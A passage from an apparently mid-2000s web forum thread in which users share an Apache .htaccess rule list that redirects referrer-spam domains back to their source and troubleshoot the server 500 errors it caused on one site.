RewriteCond %{HTTP_REFERER} (aaacloseoutsnetwork) [NC,OR]
RewriteCond %{HTTP_REFERER} (a9) [NC,OR]
RewriteCond %{HTTP_REFERER} (accepted) [NC,OR]
RewriteCond %{HTTP_REFERER} (aeterna-tech.com) [NC,OR]
RewriteCond %{HTTP_REFERER} (andrewsaluk) [NC,OR]
RewriteCond %{HTTP_REFERER} (alleghanyeda) [NC,OR]
RewriteCond %{HTTP_REFERER} (algebra-test) [NC,OR]
RewriteCond %{HTTP_REFERER} (archined) [NC,OR]
RewriteCond %{HTTP_REFERER} (asianrelations) [NC,OR]
RewriteCond %{HTTP_REFERER} (atspace) [NC,OR]
RewriteCond %{HTTP_REFERER} (autoglaser-scout) [NC,OR]
RewriteCond %{HTTP_REFERER} (autospiegel) [NC,OR]
RewriteCond %{HTTP_REFERER} (avalon) [NC,OR]
RewriteCond %{HTTP_REFERER} (axionfootwear) [NC,OR]
RewriteCond %{HTTP_REFERER} (barnevakten) [NC,OR]
RewriteCond %{HTTP_REFERER} (baden24) [NC,OR]
RewriteCond %{HTTP_REFERER} (bestall) [NC,OR]
RewriteCond %{HTTP_REFERER} (bizclassifiedsplace) [NC,OR]
RewriteCond %{HTTP_REFERER} (blogspot) [NC,OR]
RewriteCond %{HTTP_REFERER} (brugtespil) [NC,OR]
RewriteCond %{HTTP_REFERER} (brutalblowjobs) [NC,OR]
RewriteCond %{HTTP_REFERER} (candiria) [NC,OR]
RewriteCond %{HTTP_REFERER} (carisoprodol) [NC,OR]
RewriteCond %{HTTP_REFERER} (cialis) [NC,OR]
RewriteCond %{HTTP_REFERER} (clarich) [NC,OR]
RewriteCond %{HTTP_REFERER} (closeouts-central) [NC,OR]
RewriteCond %{HTTP_REFERER} (codychesnutt) [NC,OR]
RewriteCond %{HTTP_REFERER} (conecrusher) [NC,OR]
RewriteCond %{HTTP_REFERER} (continentaltirebowl.com) [NC,OR]
RewriteCond %{HTTP_REFERER} (dreambook) [NC,OR]
RewriteCond %{HTTP_REFERER} (ducoon) [NC,OR]
RewriteCond %{HTTP_REFERER} (dyndns) [NC,OR]
RewriteCond %{HTTP_REFERER} (edthompson) [NC,OR]
RewriteCond %{HTTP_REFERER} (emffsquad) [NC,OR]
RewriteCond %{HTTP_REFERER} (erotic) [NC,OR]
RewriteCond %{HTTP_REFERER} (eviliscious.com) [NC,OR]
RewriteCond %{HTTP_REFERER} (feathers) [NC,OR]
RewriteCond %{HTTP_REFERER} (ford) [NC,OR]
RewriteCond %{HTTP_REFERER} (forskning) [NC,OR]
RewriteCond %{HTTP_REFERER} (foxmediasolutions.com) [NC,OR]
RewriteCond %{HTTP_REFERER} (globaleducationeurope.net) [NC,OR]
RewriteCond %{HTTP_REFERER} (golf) [NC,OR]
RewriteCond %{HTTP_REFERER} (handy) [NC,OR]
RewriteCond %{HTTP_REFERER} (hellclan) [NC,OR]
RewriteCond %{HTTP_REFERER} (hot.ee) [NC,OR]
RewriteCond %{HTTP_REFERER} (jroundup) [NC,OR]
RewriteCond %{HTTP_REFERER} (jubii) [NC,OR]
RewriteCond %{HTTP_REFERER} (kabel1) [NC,OR]
RewriteCond %{HTTP_REFERER} (kfzbetrieb) [NC,OR]
RewriteCond %{HTTP_REFERER} (kuckdoch) [NC,OR]
RewriteCond %{HTTP_REFERER} (kylos) [NC,OR]
RewriteCond %{HTTP_REFERER} (landsend) [NC,OR]
RewriteCond %{HTTP_REFERER} (latinonakedgirl) [NC,OR]
RewriteCond %{HTTP_REFERER} (livecamsdir) [NC,OR]
RewriteCond %{HTTP_REFERER} (livenet) [NC,OR]
RewriteCond %{HTTP_REFERER} (liveplanets.com) [NC,OR]
RewriteCond %{HTTP_REFERER} (lycos) [NC,OR]
RewriteCond %{HTTP_REFERER} (lyopsrulezforever) [NC,OR]
RewriteCond %{HTTP_REFERER} (maturex3) [NC,OR]
RewriteCond %{HTTP_REFERER} (megrisoft) [NC,OR]
RewriteCond %{HTTP_REFERER} (mundoemule) [NC,OR]
RewriteCond %{HTTP_REFERER} (myblogsite) [NC,OR]
RewriteCond %{HTTP_REFERER} (netfirms) [NC,OR]
RewriteCond %{HTTP_REFERER} (online.biz) [NC,OR]
RewriteCond %{HTTP_REFERER} (phntrmn) [NC,OR]
RewriteCond %{HTTP_REFERER} (plataforma-asp) [NC,OR]
RewriteCond %{HTTP_REFERER} (protzonbeer) [NC,OR]
RewriteCond %{HTTP_REFERER} (quickcontactsonline) [NC,OR]
RewriteCond %{HTTP_REFERER} (qxl) [NC,OR]
RewriteCond %{HTTP_REFERER} (radarfalle) [NC,OR]
RewriteCond %{HTTP_REFERER} (rentacoder) [NC,OR]
RewriteCond %{HTTP_REFERER} (ringtone) [NC,OR]
RewriteCond %{HTTP_REFERER} (roxtet) [NC,OR]
RewriteCond %{HTTP_REFERER} (rstrading) [NC,OR]
RewriteCond %{HTTP_REFERER} (ru.ru) [NC,OR]
RewriteCond %{HTTP_REFERER} (saab) [NC,OR]
RewriteCond %{HTTP_REFERER} (sbj-broadcasting) [NC,OR]
RewriteCond %{HTTP_REFERER} (shape.de) [NC,OR]
RewriteCond %{HTTP_REFERER} (shpirti) [NC,OR]
RewriteCond %{HTTP_REFERER} (skip) [NC,OR]
RewriteCond %{HTTP_REFERER} (skynetblogs) [NC,OR]
RewriteCond %{HTTP_REFERER} (spray) [NC,OR]
RewriteCond %{HTTP_REFERER} (startkabel) [NC,OR]
RewriteCond %{HTTP_REFERER} (super-illu) [NC,OR]
RewriteCond %{HTTP_REFERER} (testthis) [NC,OR]
RewriteCond %{HTTP_REFERER} (timberfrog) [NC,OR]
RewriteCond %{HTTP_REFERER} (tiscali) [NC,OR]
RewriteCond %{HTTP_REFERER} (tonspion) [NC,OR]
RewriteCond %{HTTP_REFERER} (unifac) [NC,OR]
RewriteCond %{HTTP_REFERER} (volja) [NC,OR]
RewriteCond %{HTTP_REFERER} (wanadoo) [NC]
RewriteRule ^(.*) %{HTTP_REFERER} [R=301,L]

Please note that I commented out the one referrer with "mail" in it as it was causing me to not be able to click my forum/pm links in the emails to punch out to my site...

giantmidget · Hangin' Around Joined: Nov 27, 2005 Posts: 44

Tried Montego's list in root htaccess and also nuke htaccess. In root, I tried it with and without RewriteEngine on/off. Either way kept giving me 500 errors.

montego · Posted: Mon Nov 06, 2006 6:32 pm

giantmidget, this topic is not about Server 500 errors. Do a search on those words and you will get a wealth of topics to look through. Bottom line: you have something in your .htaccess file that your Host does not allow you to override.

giantmidget · Hangin' Around Joined: Nov 27, 2005 Posts: 44

What I was saying was I tried your full length rewrite blocker you posted above in this thread and that caused them. My site works fine otherwise. I removed the listing and completely back to normal. It did not like something in it apparently.

montego · Posted: Mon Nov 06, 2006 7:17 pm

Did you already have any other Rewrite statements in your .htaccess file?